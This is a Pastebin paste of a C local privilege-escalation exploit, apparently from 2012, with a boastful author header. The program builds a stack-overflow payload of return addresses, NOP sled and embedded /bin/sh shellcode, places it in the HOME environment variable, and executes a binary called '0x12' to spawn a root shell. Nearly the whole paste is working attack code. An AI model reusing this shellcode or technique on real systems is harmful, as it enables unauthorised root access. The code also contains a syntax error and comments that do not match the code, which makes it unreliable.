Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /********************************************************************************/
- /* 0x12 (sh1ts4uce) exploit by phyrrus9 */
- /* Copyright(c) 2012 phyrrus9 and the Private Dev Team */
- /* */
- /*This program will execute a standard buffer overflow and spawn a root shell by*/
- /*using a standard ramdisk block with the placement of NOP characters at needed */
- /*locations allowing the device to jump straight to the shell execution code and*/
- /*spawn the root shell. This is then handled by some other magical force in the*/
- /*universe. This code is NOT public, and shall never be as I dont want to show */
- /*anybody the work I do because I am a lazy asshole and you can just shove it if*/
- /*you have a problem about it. Have a nice day and thank you for your time!!!!!*/
- /* */
- /* If you have questions or concerns, email me at <phyrrus9@gmail.com> */
- /********************************************************************************/
- #include <stdio.h>
- #include <unistd.h>
- #include <stdlib.h>
- static char shellcode[]=
- "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
- "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
- #define NOP 0x90
- #define LEN 1032
- #define RET 0xbffff574
- int main()
- {
- fprintf(stderr, "Initializing 0x21");
- char buffer[LEN];
- long retaddr = RET;
- int i;
- fprintf(stderr, "============================");
- fprintf(stderr, "Initialized!!!!!");
- fprintf(stderr,"using address 0x%lx\n",retaddr);
- fprintf(stderr, "Preload begin stage one ");
- /*flood*/
- for (i=0;i<LEN;i+=4)
- *(long *)&buffer[i] = retaddr;
- fprintf(stderr, "flooded buffer with returns ");
- fprintf(stderr, "begin stage two ");
- /* a little puzzle piecing */
- for (i=0;i<LEN-strlen(shellcode)-100);i++)
- *(buffer+i) = NOP;
- fprintf(stderr, "placed padding on exploit ");
- fprintf(stderr, "begin stage three ");
- /* place the exploit */
- memcpy(buffer+i,shellcode,strlen(shellcode));
- fprintf(stderr, "copied exploit to ramdisk ");
- fprintf(stderr, "begin stage four ");
- setenv("HOME", buffer, 1);
- fprintf(stderr, "Final stage begin ");
- fprintf(stderr, "Execute exploit and spawn #");
- execlp("0x12","0x12",NULL);
- return 0;
- }
Add Comment
Please, Sign In to add comment